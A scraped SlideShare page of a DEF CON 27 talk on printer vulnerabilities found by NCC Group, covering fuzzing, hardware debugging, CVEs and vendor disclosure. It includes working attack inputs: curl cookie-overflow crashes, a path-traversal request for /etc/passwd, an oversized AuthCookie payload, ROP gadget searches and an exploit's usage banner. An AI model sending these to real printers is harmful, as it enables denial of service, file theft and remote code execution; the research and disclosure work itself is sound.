SlideShare a Scribd company logo

DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane office

Felipe Prado, profile picture
Felipe Prado

The document discusses vulnerabilities found in common office equipment like printers. It begins with an introduction explaining the researchers' approach of analyzing the security of enterprise printers from various manufacturers through a red teaming methodology. They found printers pose risks as they sit on corporate networks, process sensitive data, and are often assumed to be low risk. The document then covers the large attack surface printers present, including exposed services, firmware, and hardware issues. It describes common flaws found like weak configurations, default credentials, and memory corruption issues. Finally, it provides an example of exploiting a stack buffer overflow vulnerability to achieve remote code execution on a printer.

Technology
Related topics:
Information Security
1 of 67
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
Why you should fear your "mundane" office equipment Daniel Romero @daniel_rome Mario Rivas @grifo
Who the hell are these guys? Daniel Romero Pérez  Principal Security Consultant  Focused on IoT / Embedded Systems  Hardware, RE, exploiting, etc.  @daniel_rome  daniel.romero@nccgroup.com Mario Rivas Vivar  Senior Security Consultant  Too many interests  Last focused in what you will see here   @grifo  mario.rivas@nccgroup.com Both from ´s Madrid office
Agenda  Introduction and attack surface  Testing methodology and fuzzing  A way across the vulnerabilities found  Let’s exploit something!  Conclusions
Introduction
Introduction  Figure out the current state of security of enterprise embedded devices (such as printers)  Medium-size enterprise printers:  Xerox, HP  Ricoh, Brother  Lexmark, Kyocera  Red Teaming approach  It wasn’t an assessment  One RCE vuln would be enough
Why printers?  Networked printers have been around since at least the 1980s  They sit and are configured on sensitive parts of corporate networks  Great for pivoting and launch network attacks  They process all manner of information  Corporate Sensitive, Personal Sensitive, Financial, Customer etc.  They are often assumed to be low risk targets and fairly dumb in capability  Shadow IT – printers might be purchased through unofficial procurement channels
Why printers?  Networked printers have been around since at least the 1980s  They sit and are configured on sensitive parts of corporate networks  Great for pivoting and launch network attacks  They process all manner of information  Corporate Sensitive, Personal Sensitive, Financial, Customer etc.  They are often assumed to be low risk targets and fairly dumb in capability  Shadow IT – printers might be purchased through unofficial procurement channels
Why printers?
Attack Surface
Attack Surface Embedded device:  RTOS  Linux Printer Lang and Services Mgmt. Services and others External Services Proximity Attacks: WiFi, USB, NFC, etc. Mobile Apps Web App And Web Serv File Parsers Updates & Firmware Hardware Analysis Post Exploitati on
Attack Surface Embedded device:  RTOS  Linux Printer Lang and Services Mgmt. Services and others External Services Web App And Web Serv Updates & Firmware Hardware Analysis Post Exploitati on
Huge Attack Surface Hardware Exposed Services UART/Serial Firmware Firmware Updates Printer Services RAWIPPLPD SMB FTP Web and Web Services Management Services External Software SNMP Netbios External Interactions Remote Management Printer Capabilities WiFi Included in the “scope” Not Tested (future work?) Google Cloud Print Web Services Web Application JTAG Exposed Memories Maintenance Modes NFC WiFi Direct Access AirPrint Telnet Printer Languages / File Formats PJL PCL PS PDF Image Formats Others Mobile Apps Desktop Applications Other Services Finger MDNS SVRLOC VNC Unknown Services L2 / L3 Protocols TCP UDP ICMP …
Testing Methodology and Fuzzing
Methodology Setting Printers Up Attack Surface Study Vulnerability Research Vuln. Disclosure & Research Presentation Bug Analysis Exploitation & Post- Exploitation Firmware Analysis State of the Art Hardware Analysis
Fuzzing & Approach Taken  Dumb Fuzzing  Get valid communications  Generate random (and invalid) mutations  Start fuzzing after a few minutes  Understanding the crash is harder  Smart Fuzzing  Implement RFC compliant messages  Mutate what you want, how you want  More coding time  Way easier to investigate the crash
Our fuzzer  The main objective was to make our life easier while fuzzing  Based on Sulley Fuzzer for data generation [https://github.com/OpenRCE/sulley]  Actually, a fork from BooFuzz [https://github.com/jtpereyda/boofuzz]  Great Request, Connection, Logger and Session modules  After Sulley and Boo… Wazowski was next, so…  We called it Fuzzowski  Python3  Improved Strings fuzzing libraries,  Custom lists, files and callback command injection mutations  Fuzzer modules, to keep all your fuzzers under one single program  Lots of little tweaks to adapt the fuzzing session  We try to solve the difficulties that we were having while fuzzing…
Fuzzowski Difficulties  Different behaviours for the same protocols  Different ways to detect a crash  Need to reboot targets manually after a crash  Retesting a “suspect” packet can be a pain  Understanding your mutated packets can be hard  Need to report to the manufacturer a lot of different crashes Our Solutions Flexibility to adapt the fuzzing session Monitor modules to check what we want Restarter modules which are called after losing connection to the target CLI to pause and control the fuzzing session Nice print formats for suspect packets (to know exactly what was fuzzed) Save standalone scripts to send a crash PoC
Fuzzowski Requests Blocks Primitive Types Connections UDPTCP Loggers FileConsoleSSL Protocol Fuzzers IDPLDP Monitors PSICMP Stack Trace Restarters Smart Plugs Exec Command Suspects PoCsCrashes Fuzzing Session REPL SSH CLI Main Program modified BooFuzz modules
Fuzzowski Demo https://asciinema.org/a/t3WLF5IPo7splsAHDinuuXZEr
The code will be available after the talk: https://github.com/nccgroup/fuzzowski
Just a bit of Hardware
Hardware Analysis  Basic approach!  Focused on things to help us with the exploitation  Debug interfaces  Dump memories  Test points and...  Short circuit all the things!  One of our printers will never print again…
Exposed Memories # ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E flashrom 0.9.9-91-g0bfa819 on Linux 4.15.0-42-generic (x86_64) flashrom is free software, get the source code at https://flashrom.org flashrom was built with libpci 3.2.1, GCC 4.8.4, little endian Command line (7 args): ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E Using clock_gettime for delay loops (clk_id: 1, resolution: 1ns). Initializing buspirate_spi programmer Detected Bus Pirate hardware v3b Detected Bus Pirate firmware 5.10 Using SPI command set v2. SPI speed is 1MHz Raw bitbang mode version 1 Raw SPI mode version 1 The following protocols are supported: SPI. Probing for Macronix MX25L12835F/MX25L12845E/MX25L12865E, 16384 kB: probe_spi_rdid_generic: id1 0xc2, id2 0x2018 ...
Hardware Issues  UART/Serial Debugging Ports  Tons of debug information  Write and execute your assembly here! JTAG UART 1 - GND (black) 2 - Rx (yellow) 3 - Tx (green) 4 - VCC Pinout 1 - GND 2 - Rx 3 - Tx 4 - VCC Pinout JTAG UART JRS1 1 - GND 2 - Rx 3 - Tx 4 - VCC JRS2 1 - VCC 2 - Rx 3 - Tx 4 - GND Pinout
Hardware Issues  Hardware Backdooring:  Serial allowed read, write and execute  Raspberry Pi → hardware backdoor  Pi connected to WiFi AP Printer UART Pinout VCC GNC Rx Tx Raspberry PI Pinout (4) 5V (6) GND (8) GPIO 14 (TXD) (10) GPIO 15 (RXD) 363:[199714]:<kb_uart >addr/address:show address value 364:[199714]:<kb_uart >addrc/addressc:change address value 367:[199714]:<kb_uart >sh:show shell command help 368:[199714]:<kb_uart >shell:shell run a function in task mode 369:[199714]:<kb_uart >sd/shelld:stop a running shell task 370:[199714]:<kb_uart >sda/shelld,all:stop all running shell task 371:[199714]:<kb_uart >Shell command example: 372:[199714]:<kb_uart >[shell 0x12345678 1234] 373:[199714]:<kb_uart >shell run a function locate at 0x12345678 with arg 1234
Common Flaws Found
Common Web Application Issues  Weak Default Configurations  Tons of services exposed enabled by default, with weak configurations  Default Credentials (or no credentials required!)  Clear Text Communications  Cross-Site Request Forgery  Broken Access Controls  Cross-Site Scripting issues
Common Web Application Issues
Path Traversal  Allowed to access some file extensions anywhere in the filesystem  sh, js, css, htm...  Allowed to check if a file existed or not  Could also be used to get files that otherwise would require authentication okhtmfile=/js/../../../etc/passwd - Error 500 okhtmfile=/js/../../../etc/notexist – Error 404 POST /box/set.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded okhtmfile=/js/../../../../../../etc/init.d/host name.sh&failhtmfile=[...] HTTP/1.1 200 OK ETag: "/js/../../../../../../etc/init.d/hostname.sh, Wed, 30 Jan 2019 09:53:39 GMT" Content-Type: application/x-sh #!/bin/sh ### BEGIN INIT INFO # Default-Start: S # Default-Stop: # Short-Description: Set hostname based on /etc/hostname ### END INIT INFO HOSTNAME=$(/bin/hostname) hostname -b -F /etc/hostname 2> /dev/null […]
these issues are not bad, but…
Hidden Functionalities CVE-2019-9934
Hidden Functionalities CVE-2019-9934 CVE-2019-13194
Hidden Functionalities CVE-2019-9934 CVE-2019-13194 CVE-2019-14301
Hidden Functionalities CVE-2019-9934 CVE-2019-13194 CVE-2019-14301
 Printer 1  Multiple Buffer Overflow Parsing Cookies Values (x6)  Buffer Overflow Setting WiFi Values  Buffer Overflow Setting mDNS Values  Buffer Overflow Setting Notification Alerts  Buffer Overflow Setting POP3 Values  Buffer Overflow Setting SMTP Values  Denial of Service Setting SNMP Values  LPD Denial of Service by Sending a Queue command  Buffer Overflow Sending a Crafted LPD Packet  Multiple Buffer Overflows Parsing IPP Packets (x3)  Printer 2  Buffer Overflow in Fax Number  Buffer Overflow in IPP attribute names  Buffer Overflow in IPP attribute values  Buffer Overflow in IPP attribute sizes  Multiple Buffer Overflows in IPP parser  Printer 3  Buffer Overflow in “AuthCookie” cookie  Heap Buffer Overflow in IPP attribute’s name  Printer 4  Buffer Overflow in Content-Type Header  Buffer Overflow in Authentication Cookie  Multiple Buffer Overflows parsing IPP Attributes (x3)  Buffer Overflow in Google Cloud Print  Printer 5  Buffer Overflow Parsing The LexLang Cookie  Buffer Overflow Parsing The Request URI (x6)  Buffer Overflow Parsing Content-Type Headers  Memory Corruption in SNMP (DoS)  Memory Corruption Parsing Config Parameters  Printer 6  Buffer Overflow parsing URI paths  Buffer Overflow in several Web Application Functionalities  Buffer Overflow with Big Control Files in LPD  Multiple Memory Corruptions Parsing IPP Packets Memory Corruption Issues
Memory Corruption Issues – Crashes Everywhere Exception address: 0x58585858 Current Processor Status Register: 0x60000013 Task: 0x17bd770 "HC02P“ ... Exception PC = 0x58585858 Current PSR = 0x60000013 -------------------------------------------- TRACE STACK: -------------------------------------------- current stack = 0x017be52c start stack = 0x00100000 text_start = 0x00100000 text_end = 0x00a35220 -------------------------------------------- 001 : 0x0039c720 002 : 0x0011ad24
Let´s Exploit Something! (Part 1)
CVE-2019-14300: Multiple Stack Buffer Overflow Parsing Cookies Values (x6) Stack Buffer Overflow – The easy case
Vuln. Exploitation - Going back to 90's exploits? Stack Buffer Overflow – The easy case // Decompiled source code lang_ptr = f_strstr(cookie_header, "print_language"); lang_ptr2 = lang_ptr; if ( p_lang_pointer ) { v5 = * p_lang_pointer; v6 = v5; if ( v5 != ';' ) v6 = v5; if ( v6 ) { count = 0; } else { count = 0; do { ++count; v9 = * p_lang_pointer++[ 1]; v8 = v9= v10; if ( v9 != ';' ) v10 = v8; } while ( !v10 ); } strncpy(v_tmp_cookie, (lang_ptr2 + 15), count - 15); // Stack Buffer Overflow } * Do you really think there is only one bug here? print_language = XXXXXXXXXXXXXX.. Cookie bytes: 0-14 15 16-N
Vuln. Exploitation - Going back to 90's exploits? Stack Buffer Overflow – The easy case // Decompiled source code lang_ptr = f_strstr(cookie_header, "print_language"); lang_ptr2 = lang_ptr; if ( p_lang_pointer ) { v5 = * p_lang_pointer; v6 = v5; if ( v5 != ';' ) v6 = v5; if ( v6 ) { count = 0; } else { count = 0; do { ++count; v9 = * p_lang_pointer++[ 1]; v8 = v9= v10; if ( v9 != ';' ) v10 = v8; } while ( !v10 ); } strncpy(v_tmp_cookie, (lang_ptr2 + 15), count - 15); // Stack Buffer Overflow } * Do you really think there is only one bug here? print_language = XXXXXXXXXXXXXX.. Cookie bytes: 0-14 15 16-N # DoS Proof of Concept 1: $ curl --cookie "print_language=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" http://printer/index.asp # DoS Proof of Concept 2: $ curl -H 'Cookie: print_language;' http://printer/index.asp
Stack Buffer Overflow – The easy case  ASLR (HEAP & STACK)  No SW Debug  RTOS (1Kernel / 1Binary) Vuln. Exploitation - Going back to 90's exploits? Send Shellcode (btw. patterns) Dump RAM (Mem. Leak) Identify Shellcode address Trigger the BoF Jump to the Shellcode Exploitation chain:  Direct PC overwritten  Potential RWX  No NX  Mem leak Helpers:Difficulties:
Stack Buffer Overflow – The easy case But, what is one of the most important data managed by a printer? THE DOCUMENTS!
Stack Buffer Overflow – The easy case DEMO
Let´s Exploit Something! (Part 2)
Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values  One of the first bugs found  Initially , it was not analyzed in depth as:  No SOFTWARE or HARDWARE debug  The Kernel implements other protections GET /deadbeef HTTP/1.1 Host: printer User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/62.0 Accept-Language: en-US Cookie: AuthCookie=5a482cb4aabdcc97d5293221dff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA%3D%3DAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[SNIP] Connection: close Part 1 Part 2
CVE-2019-13193: Buffer Overflow in Cookie Values AuthCookie=5a482cb408cc97d5298b6eff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA %3D%3DAAAAAAAAAAAAAAAAAA[SNIP] After RE’ing the printer’s firmware: 1) Parse headers 2) Get cookies values 3) Check the first part of the cookie 4) Get and check the second part of the cookie (after “:”) 4.1) Decode the base64 value 4.2) Get a TOKEN and a KEY from memory 4.3) Calculate a SHA1 HASH from KEY 4.4) … Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values Buffer Overflow – The tricky case struct cookie_s { int *src_ptr; # base64 cookie string int *dst_ptr; # base64 decoded result char junk[4]; __int16 src_len; # source len __int16 dst_len; # destination len }; base64_decode(struct *cookie_s)
CVE-2019-13193: Buffer Overflow in Cookie Values int get_check_second_part_cookie(int *b64_cookie_text) {..} Buffer Overflow – The tricky case Q: Can you spot the bug? struct cookie_s { int *src_ptr; # base64 cookie string int *dst_ptr; # base64 decoded result char junk[4]; __int16 src_len; # source len __int16 dst_len; # destination len };
Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Function get_check_second_part_cookie() emulation: Calling to: strlen, base64_decode, etc. $ python check-cookie-emul.py $(python -c 'print "A"*100' | base64 -w 0) ========================== Emulating THUMB code snip - >>> Tracing instruction at 0x1474b78, instruction size = 0x2 ERROR: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED) >>> r0 = 0x3 >>> r3 = 0x1281010 >>> r4 = 0x41414141 >>> r5 = 0x41414141 >>> lr = 0x1001000 >>> sp = 0x1002000 >>> pc = 0x41414140 ========== SP register: 4141414141414141414141414141414141414141414141414141414141414141414141000000000000 https://www.unicorn-engine.org/
Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values But everything became insane here:  No executable STACK - NX  Firmware addresses didn’t work - ASLR?  Modified T-KERNEL (RTOS) in use:  Protection levels  Thousands of *linker* structures  Non monolithic OS - Apps / Tasks (Offsets)  Shared memory  Can implement MMU Therefore, we didn’t know:  Where and how our shellcode can be execute ( ~ASLR + NX )  Valid addresses to create a ROP chain
Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Some potential (and insane) approaches:  RE the T-KERNEL structure – No time!  RE the bootloader (potential static addresses)  Identify static memory – Permissions?  Brute-force random addresses  Looking for code helpers Infinite Loop! - Blind Exploitation?
CVE-2019-13193: Buffer Overflow in Cookie Values Brute-forcing the PC register with potential firmware addresses and figure out what instructions were executed.. Example 1 - Identifying POP instructions: Buffer Overflow – The tricky case Potential Epilog 1: 0x10: ... 0x12: ... 0x14: pop {r0, pc} AAAA AAAA AAAA INFINITE_LOOP … SP PC: 0x14 Before execution AAAA AAAA AAAA INFINITE_LOOP … SP R0: AAAA PC: AAAA After execution PRINTER DOWN!
CVE-2019-13193: Buffer Overflow in Cookie Values Brute-forcing the PC register with potential firmware addresses and figure out what instructions were executed.. Example 1B - Identifying POP instructions: Buffer Overflow – The tricky case Potential Epilog 1: 0x10: ... 0x12: ... 0x14: pop {r0, pc} AAAA INFINITE_LOOP … … … SP PC: 0x14 Before execution AAAA INFINITE_LOOP … … … SP R0: AAAA PC: INFINITE_LOOP After execution PRINTER UP!
Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Two matcheable behaviours, that allowed us to identify a valid offset assigned to the web RTOS task, were found. add sp, 28 pop {r0, r1, pc} 0x12 0x14 pop {r0-r7, pc}0x512 Printer Memory Firmware Data add sp, 28 pop {r0, r1, pc} 0x1132 0x1134 pop {r0-r7, pc}0x1632 .... .... 0x500  Task Offset: 0x1132 - 0x12 = 0x1120  Only for this (web) RTOS task  This provided us useful ROP gadgets and potential helpers to continue the task execution (which is really important)
Buffer Overflow – The tricky case What about creating ROP chains with (not coherent) IMAGE (GIF or PNG) offsets? $ for i in `ls *.{gif,png}`; do echo "========== $i"; python ROPgadget.py --rawArch=arm --rawMode=thumb -- binary $i | grep "pop {"; done | grep -E "(==|str r6)" ========== adhoc.gif ========== allow2.gif - SNIP - ========== device-icons-128.png 0x000000000000034e : str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc} 0x0000000000000346 : strh r2, [r7, #0x12] ; ldm r6, {r1, r2, r3, r6, r7} ; ldrh r6, [r1, r1] ; add r4, sp, #0x144 ; str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc} ========== device-icons-512.png 0x0000000000009eb4 : adds r4, #0x61 ; adds r4, r0, #1 ; b #0xa346 ; strh r2, [r3, r5] ; str r6, [sp, #0x14c] ; stm r5!, {r0, r4, r6} ; pop {r2, r4, r5, r6, pc} - SNIP - CVE-2019-13193: Buffer Overflow in Cookie Values "Debug Information Exposed": http://printer/httpd/diag/url_list.html
Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Approach: Using ROP gadgets found to write a shellcode into a RWX memory (e.g. PNG files) and jump to it. Instruction and Data CACHES! Some options to flush the cache:  ARM Instruction: MOV r0, #0 + MCR p15, 0, r0, c7, c5, 0 ; Clear r0 + Flush entire  Sleep(), mprotect(), etc. calls  Continue the execution flow (harder, but the most “professional” option)
Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Continuing the execution flow: 1) ROP (part 1) should execute our payload 2) ROP (part 2) should change the address (within stack), that overwrites PC once the bug is triggered, with a valid function address (e.g. func 1.1.1) 3) ROP (part 3) should align the SP to the previous state, just before triggering the bug. 4) Trigger the vuln as many times as you want SP = 0x1000Func. 1 Task Stack Frames SP = 0x900Func. 1.1 SP = 0x700Func. 1.1.1 SP = 0x550Vuln. Func .... SP = 0x5000 SP = 0x4000 SP = 0x3000 SP = 0x17c0
CVE-2019-13193: Buffer Overflow in Cookie Values Stack Buffer Overflow – The tricky case DEMO $ python exploit-persepolis-v2.py [*] [*] .-------. Printer buffer overflow exploit (Persepolis) [*] | ROOT | Author: Daniel Romero (NCC Group) [*] __|_______|__ [*] | _________--| Firm ver: [REDACTED] [*] `-/.:::::::.-' [*] `----------' [*] [*] [*] Usage: ./exploit-persepolis-v2.py write [BYTES_TO_BE_WRITTEN] [JUMP TO SHELLCODE Y/N] [*] ./exploit-persepolis-v2.py writefile [FILE_PATH] [*] ./exploit-persepolis-v2.py read [SOURCE_ADDRESS] [SIZE] [*]
Conclusions
Responsible Vulnerability Disclosure  We started this process in February!  Mixed response from the printer manufacturers  Some had very mature vulnerability disclosure procedures  Some others did not have any process for this, 2 months stuck trying to contact some of them  All have published patches solving most of the issues by now  Security advisories already published:  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-lexmark-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-hp-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-brother-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-ricoh-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-xerox-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-kyocera-printers/
Vulnerability Overview Web ApplicationHardware Printer Services Printer Languages Other Services Too many issues Also a lot of issues Code Execution
CVE List HP CVE-2019-6323 Reflected Cross-Site Scripting CVE-2019-6324 Stored Cross-Site Scripting CVE-2019-6325 Cross-Site Request Forgery CVE-2019-6326 Multiple Buffer Overflow in Web CVE-2019-6327 Multiple Buffer Overflow in IPP Lexmark CVE-2019-9930 Multiple Buffer Overflows in Web CVE-2019-9931 SNMP Denial of Service Vulnerability CVE-2019-9932 Multiple Buffer Overflows in Web CVE-2019-9933 Multiple Buffer Overflows in Web CVE-2019-9934 Information Disclosure Vulnerabilities CVE-2019-9935 Information Disclosure Vulnerabilities CVE-2019-10057 Cross-Site Request Forgery CVE-2019-10058 No Account Lockout Implemented CVE-2019-10059 Information Disclosure Vulnerability Xerox CVE-2019-13165 Multiple Buffer Overflow in IPP CVE-2019-13166 No Account Lockout Implemented CVE-2019-13167 Multiple Stored Cross-Site Scripting CVE-2019-13168 Multiple Buffer Overflow in IPP CVE-2019-13169 Buffer Overflow in HTTP Headers CVE-2019-13170 Cross-Site Request Forgery CVE-2019-13171 Buffer Overflow in Google Cloud Print Implementation CVE-2019-13172 Buffer Overflow in Authentication Cookie Brother CVE-2019-13192 Heap Overflow in IPP Attribute Names CVE-2019-13193 Stack Buffer Overflow in Cookie Values CVE-2019-13194 Information Disclosure Vulnerability in Web Server Kyocera CVE-2019-13195 Path Traversal in Web Server CVE-2019-13196 Multiple Buffer Overflow in Web Server (1) CVE-2019-13197 Multiple Buffer Overflow in Web Server (2) CVE-2019-13198 Stored Cross-Site Scripting CVE-2019-13199 Lack of Cross-Site Request Forgery Countermeasures CVE-2019-13200 Reflected Cross-Site Scripting CVE-2019-13201 Buffer Overflow in LPD Service CVE-2019-13202 Multiple Buffer Overflow in Web Server (3) CVE-2019-13203 Integer Overflow in Web Server CVE-2019-13204 Multiple Buffer Overflow in IPP Service CVE-2019-13205 Broken Access Controls in Web Server CVE-2019-13206 Multiple Buffer Overflow in Web Server (4) Ricoh CVE-2019-14299 No Account Lockout Implemented CVE-2019-14300 Buffer Overflow in HTTP Headers CVE-2019-14301 Information Disclosure Vulnerability in Web Server CVE-2019-14302 Hardware Debug Exposed CVE-2019-14303 Denial of Service with LPD Command CVE-2019-14304 Cross-Site Request Forgery CVE-2019-14305 Multiple Buffer Overflows in Web Application CVE-2019-14306 Broken Access Controls CVE-2019-14307 Denial of Service Setting SNMP Values CVE-2019-14308 Buffer Overflow in LPD Service CVE-2019-14309 FTP Hardcoded Credentials CVE-2019-14310 Buffer Overflow in IPP Service (1) CVE-2019-14311 Buffer Overflow in IPP Service (2)
Impact of the Research & Conclusions  Common office devices present in all organizations  Very immature state of security  Largely ignored in most organizations  Large number of critical and high risk issues in 6 of 6 printers tested  Functional PoC Unauthenticated RCE exploits for 4 of them (we ran out of time)  50 CVEs  We stopped searching after a few vulnerabilities… there are probably more  We only looked at a small part of the attack surface… there is a lot more  The first researcher who takes a look will likely hit the jackpot!  Shared code between different products of the same vendors  Huge number of devices affected
Recommendations For printer manufacturers:  Security in product development life cycle  Assess your products!  Hardware  Services  Code  Review your vulnerability disclosure procedures For hackers:  Give it a try!  There are vulnerabilities waiting for you  A lot to learn, and a lot of FUN! For organizations:  Start by considering them as threats!  Inventory of all makes, models and firmware versions  Ensure that the firmware is updated as you do for any other asset!  Perform hardening of the printers config, removing unnecessary services, etc.
What about Internet? As expected.. there was a large number of these printers connected to Internet! and... Are different manufacturers using the same code?
Acknowledgments! The research was performed at NCC Group, giving us the time and resources needed for it. Thanks to all the Madrid Office, Matt Lewis and Phillip Moss for their support, giving us ideas and helping us with the talk. And last but not least… we would like to thank to Álvaro Felipe (@alvaro_fe), who took part on this research during the first days and helped us with great ideas during the exploitation phases.
Thank you for suffering us Daniel Romero @daniel_rome Mario Rivas @grifo Achievement Unlocked! Talk at DEF CON!

More Related Content

PPTX
How to drive a malware analyst crazy
Michael Boman
 
PPTX
ShinoBOT Suite
Shota Shinogi
 
PDF
CODE BLUE 2014 : DeviceDisEnabler : A hypervisor which hides devices to prote...
CODE BLUE
 
PPTX
Fuzzing
Khalegh Salehi
 
PDF
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
CODE BLUE
 
PDF
Ceh v8 labs module 10 denial of service
Asep Sopyan
 
ODP
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
Joxean Koret
 
PPTX
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Shota Shinogi
 
How to drive a malware analyst crazy
Michael Boman
 
ShinoBOT Suite
Shota Shinogi
 
CODE BLUE 2014 : DeviceDisEnabler : A hypervisor which hides devices to prote...
CODE BLUE
 
Fuzzing
Khalegh Salehi
 
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
CODE BLUE
 
Ceh v8 labs module 10 denial of service
Asep Sopyan
 
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
Joxean Koret
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Shota Shinogi
 

What's hot (20)

PDF
Lucas apa pacsec slides
PacSecJP
 
PDF
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
Felipe Prado
 
PDF
Oleksyk applied-anti-forensics
DefconRussia
 
PPTX
Safe and secure programming practices for embedded devices
Soumitra Bhattacharyya
 
PDF
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Priyanka Aash
 
PDF
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
Aditya K Sood
 
PDF
Intrusion Techniques
Festival Software Livre
 
PDF
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
FFRI, Inc.
 
PDF
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON
 
PDF
Is there an EFI monster inside your apple? by Pedro Vilaça - CODE BLUE 2015
CODE BLUE
 
PDF
Predicting and Abusing WPA2/802.11 Group Keys
vanhoefm
 
PPTX
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
PDF
How security broken? - Android internals and malware infection possibilities
FFRI, Inc.
 
PPTX
Detect Kernel-Mode Rootkits via Real Time Logging & Controlling Memory Access
Igor Korkin
 
PDF
Inside Winnyp
FFRI, Inc.
 
PPTX
Android– forensics and security testing
Santhosh Kumar
 
PDF
BAD USB 2.0
Pradhap M
 
PPTX
2016 manta raypresentation_av_scanning_disclaimer
Doug Koster
 
ODP
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
PDF
TRITON: How it Disrupted Safety Systems and Changed the Threat Landscape of I...
Priyanka Aash
 
Lucas apa pacsec slides
PacSecJP
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
Felipe Prado
 
Oleksyk applied-anti-forensics
DefconRussia
 
Safe and secure programming practices for embedded devices
Soumitra Bhattacharyya
 
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs Vulnerability
Priyanka Aash
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
Aditya K Sood
 
Intrusion Techniques
Festival Software Livre
 
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
FFRI, Inc.
 
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON
 
Is there an EFI monster inside your apple? by Pedro Vilaça - CODE BLUE 2015
CODE BLUE
 
Predicting and Abusing WPA2/802.11 Group Keys
vanhoefm
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
How security broken? - Android internals and malware infection possibilities
FFRI, Inc.
 
Detect Kernel-Mode Rootkits via Real Time Logging & Controlling Memory Access
Igor Korkin
 
Inside Winnyp
FFRI, Inc.
 
Android– forensics and security testing
Santhosh Kumar
 
BAD USB 2.0
Pradhap M
 
2016 manta raypresentation_av_scanning_disclaimer
Doug Koster
 
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
TRITON: How it Disrupted Safety Systems and Changed the Threat Landscape of I...
Priyanka Aash
 
Ad

Similar to DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane office (20)

PPT
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
PDF
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
CODE BLUE
 
PPTX
Steelcon 2015 - 0wning the internet of trash
infodox
 
PPTX
Advanced SOHO Router Exploitation XCON
Lyon Yang
 
PDF
Linux Kernel Exploitation
Scio Security
 
PDF
amrapali builders @@hacking printers.pdf
amrapalibuildersreviews
 
PDF
Beginners guide on how to start exploring IoT 2nd session
veerababu penugonda(Mr-IoT)
 
PDF
Filip palian mateuszkocielski. simplest ownage human observed… routers
Yury Chemerkin
 
PDF
Simplest-Ownage-Human-Observed… - Routers
Logicaltrust pl
 
PDF
